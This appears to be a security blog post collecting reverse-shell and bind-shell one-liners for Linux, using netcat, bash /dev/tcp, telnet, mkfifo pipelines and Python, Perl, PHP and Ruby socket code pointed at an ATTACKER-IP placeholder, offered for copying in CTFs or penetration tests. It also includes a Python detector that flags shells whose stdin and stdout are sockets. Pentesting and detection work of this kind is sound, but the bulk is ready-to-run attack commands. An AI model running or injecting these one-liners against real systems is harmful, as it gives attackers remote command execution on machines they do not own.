
Some oneliners for Reverse-Shells or Bind-Shells

· 2 min read
Strider

Hi, I thought I'd introduce a few one-liners for reverse and bind shells.

On Linux there are a lot of ways to create a reverse or bind shell. I'll show you some of them. You can copy them if needed and use them for CTFs or penetration tests.

Reverse-Shells:

NC/NetCat:

strider@paff-shell.com~$ /bin/nc ATTACKER-IP ATTACKER-PORT  -e /bin/sh
strider@paff-shell.com~$ /bin/nc ATTACKER-IP ATTACKER-PORT  -c /bin/sh
strider@paff-shell.com~$ rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc ATTACKER-IP ATTACKER-PORT > /tmp/f

Bash:

strider@paff-shell.com~$ /bin/bash -i &> /dev/tcp/ATTACKER-IP/ATTACKER-PORT 0>&1
strider@paff-shell.com~$ /bin/sh -i &> /dev/udp/ATTACKER-IP/ATTACKER-PORT 0>&1

Telnet:

strider@paff-shell.com~$ telnet ATTACKER-IP ATTACKER-PORT1 | /bin/bash | telnet ATTACKER-IP ATTACKER-PORT2
strider@paff-shell.com~$ rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | telnet ATTACKER-IP ATTACKER-PORT > /tmp/f

Python:

strider@paff-shell.com~$ python -c "import os, socket, subprocess;s=socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.connect(('ATTACKER-IP', ATTACKER-PORT));os.dup2(s.fileno(), 0);os.dup2(s.fileno(), 1);os.dup2(s.fileno(), 2);p = subprocess.Popen(['/bin/bash', '-i']);"

Perl:

strider@paff-shell.com~$ perl -e 'use Socket;$host="ATTACKER-IP";$port=ATTACKER-PORT;socket(Sock, PF_INET, SOCK_STREAM, getprotobyname("tcp"));if(connect(Sock, sockaddr_in($port, inet_aton($host)))){open(STDIN, ">&Sock");open(STDOUT, ">&Sock");open(STDERR, ">&Sock");exec("/bin/bash -i");};'

PHP:

strider@paff-shell.com~$ php -r '$sock=fsockopen("ATTACKER-IP",ATTACKER-PORT);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'

Ruby:

strider@paff-shell.com~$ ruby -rsocket -e "exit if fork;s=TCPSocket.new('ATTACKER-IP',ATTACKER-PORT);while(s.print '$';s2=s.gets);IO.popen(s2,'r'){|s3|s.print s3.read}end"

Bind-Shells:

NC/NetCat:

strider@paff-shell.com~$ /bin/nc -e /bin/sh -nlp ATTACKER-PORT
strider@paff-shell.com~$ /bin/nc -c /bin/sh -nlp ATTACKER-PORT
strider@paff-shell.com~$ /bin/nc -c /bin/sh -nlup ATTACKER-PORT
strider@paff-shell.com~$ rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -lvp ATTACKER-PORT > /tmp/f;

Python:

strider@paff-shell.com~$ python -c "import os, socket, subprocess;s=socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.bind(('0.0.0.0', ATTACKER-PORT));s.listen(5);c, _ = s.accept();os.dup2(c.fileno(), 0);os.dup2(c.fileno(), 1);os.dup2(c.fileno(), 2);p = subprocess.Popen(['/bin/bash', '-i']);"

Perl:

strider@paff-shell.com~$ perl -e 'use Socket;$port=ATTACKER-PORT;socket(Sock, PF_INET, SOCK_STREAM, getprotobyname("tcp"));bind(Sock, sockaddr_in($port, INADDR_ANY));listen(Sock, SOMAXCONN);for(; $c = accept(C, Sock); close(Sock)){open(STDIN, ">&C");open(STDOUT, ">&C");open(STDERR, ">&C");exec("/bin/bash -i");};'

PHP:

strider@paff-shell.com~$ php -r '$sock=socket_create(AF_INET, SOCK_STREAM, SOL_TCP);socket_get_option($sock, SOL_SOCKET, SO_REUSEADDR);socket_bind($sock, "0.0.0.0", ATTACKER-PORT); socket_listen($sock); $c=socket_accept($sock);while(true){$cmd=socket_read($c, 1024);socket_write($c, shell_exec($cmd));}'

Ruby:

strider@paff-shell.com~$ ruby -rsocket -e "exit if fork;s=TCPServer.new(ATTACKER-PORT);loop do;c=s.accept();while(c.print '$';s2=c.gets);puts s2;IO.popen(s2,'r'){|s3|c.print s3.read};end;end"
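
Every one-liner above ends the same way: a shell or interpreter whose stdin and stdout are a network socket (dup2 in Python, the /dev/tcp redirection in bash, open(STDIN, ">&Sock") in Perl, proc_open with the socket in PHP). On Linux that is visible in /proc/<pid>/fd, which is what a defender can check for. The following detector is an added example written for this page, not code from the post or its repository; the process snapshot it runs on is constructed, and the name list SUSPECT_COMM is an assumption you would tune for your hosts.

```python
import os
import re
from dataclasses import dataclass

# Shells and script interpreters: every one-liner on this page ends with one of
# these holding the socket on fd 0/1/2.  Socket-activated daemons (sshd, inetd
# children) legitimately have stdio on sockets, so the name filter keeps them out.
SUSPECT_COMM = {"sh", "bash", "dash", "zsh", "python", "python3", "perl", "php", "ruby"}
SOCKET_RE = re.compile(r"^socket:\[\d+\]$")  # readlink(/proc/<pid>/fd/N) for a socket

@dataclass
class Proc:
    pid: int
    comm: str             # contents of /proc/<pid>/comm
    fds: dict[int, str]   # fd number -> readlink target

def is_stdio_on_socket(p: Proc) -> bool:
    """True when both stdin and stdout of a shell/interpreter are sockets."""
    return p.comm in SUSPECT_COMM and all(
        SOCKET_RE.match(p.fds.get(n, "")) for n in (0, 1))

def find_suspects(procs) -> list[int]:
    """Sorted PIDs worth a closer look.  Not covered: the mkfifo/nc pipelines,
    where the shell only sees pipes and nc is the process holding the socket."""
    return sorted(p.pid for p in procs if is_stdio_on_socket(p))

def snapshot_proc() -> list[Proc]:
    """Live collector for Linux; other users' fd tables are readable only as root."""
    procs = []
    for name in filter(str.isdigit, os.listdir("/proc")):
        pid, fds = int(name), {}
        try:
            with open(f"/proc/{pid}/comm") as fh:
                comm = fh.read().strip()
            for fd in os.listdir(f"/proc/{pid}/fd"):
                try:
                    fds[int(fd)] = os.readlink(f"/proc/{pid}/fd/{fd}")
                except OSError:
                    pass  # fd closed between listdir and readlink
        except OSError:
            continue      # process exited or its fd table is not readable
        procs.append(Proc(pid, comm, fds))
    return procs

# Constructed snapshot (not taken from a real host) showing the patterns involved.
SAMPLE = [
    Proc(1201, "bash", {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}),             # normal login shell
    Proc(1340, "bash", {0: "socket:[48213]", 1: "socket:[48213]", 2: "socket:[48213]"}),  # /dev/tcp or dup2 pattern
    Proc(1355, "nc", {0: "pipe:[50001]", 1: "pipe:[50002]", 3: "socket:[48300]"}),       # fifo variant: nc holds the socket
    Proc(1402, "sshd", {0: "socket:[48400]", 1: "socket:[48400]", 2: "/dev/null"}),      # daemon, filtered by name
]
```

On a real host call find_suspects(snapshot_proc()) from a periodic job and correlate hits with process ancestry and the remote address, since an interactive shell on a socket is rarely legitimate outside sshd.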

You can find all the one-liners again in a repository of mine 😄 I will update it from time to time. A small note on the side: I will not put every one-liner in this post; they are all in my repository 😄